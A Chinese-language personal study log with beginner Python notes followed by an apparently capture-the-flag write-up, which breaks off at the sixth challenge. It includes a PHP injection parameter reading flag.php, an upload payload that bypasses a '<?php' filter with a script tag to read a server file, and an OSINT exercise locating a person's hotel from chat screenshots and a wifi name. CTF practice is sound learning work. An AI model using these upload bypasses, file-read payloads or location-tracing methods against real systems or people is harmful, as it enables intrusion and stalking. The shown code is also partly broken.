记录

2019-07-06：

python是一门解释型语言，拥有许多强大的标准库，是完全面向对象语言

如果需要一段关键代码运行得更快或者希望某些算法不公开，可以把部分程序用c或c++编写，然后在python程序中使用它们

缺点：

运行速度慢

国内市场较小

可以使用任意文本编辑软件做python开发

通常文件扩展名.py

常见错误：

手误：

　　如：print写成pirnt

python是一门解释型语言一行错误，这行上面的语句任然能执行

将多条print写在一行：

　　不建议把多条语句写在一行，

缩进错误：

　　代码排列不整齐多加了空格缩进等

python2.x默认不支持中文

python3支持中文

python3命令使用python3

极少部分第三方库不支持python3.0语法，建议

　　先使用python3.0版本进行开发

　　然后使用python2.6、2.7执行，并进行一些兼容性处理

python的解释器：

交互式运行python程序

首选ipython支持自动补全，自动缩进，支持bash shell命令（控制台命令）

python单行注释 #print("hello world")

为了整齐建议在#后面添加一个空格

python多行注释""" 代码 """

算数运算符：

2019-07-07：

writeup：

　题目一：看我回旋13踢
　　密文：
　　synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}

　　使用rot13解密得flag：

　　　　flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}

　题目二：flag不在变量中

　　构造payload：?hello=file("flag.php")

 　　题目三：upload

　　上传php

　　<?php

　　$fh=fopen('../flag.php','r');

　　echo fread($fh,filesize('../falg.php'));

　　fclose($fh);

　　?>

　　发现<?php 被过滤了

　　使用script标签

　　<script language='php'>

　　$fh=fopen('../flag.'.strtolower('php'));

　　fclose($fh);

　　</script>

　　成功在上传后文件源码中找到flag

　　题目四：单身狗

　　题目中有一个二维码但右下角被一只单身狗给遮挡住了

　　使用ps将左上角的方块复制一份覆盖掉单身狗，使用在线二维码扫描成功扫描出flag

 　　题目五：女神在哪?

　　下载附件包含一堆聊天记录截图和两张风景图

　　在聊天记录里面发现女神在温州附近打开地图找到温州

　　有发现女神链接的wifi是jthjfsbg，推测是一个宾馆

　　wifi开头为qt在温州附近找到青田县然后找到宾馆为青田风尚宾馆

　　得到flag{青田风尚宾馆}

　　题目六：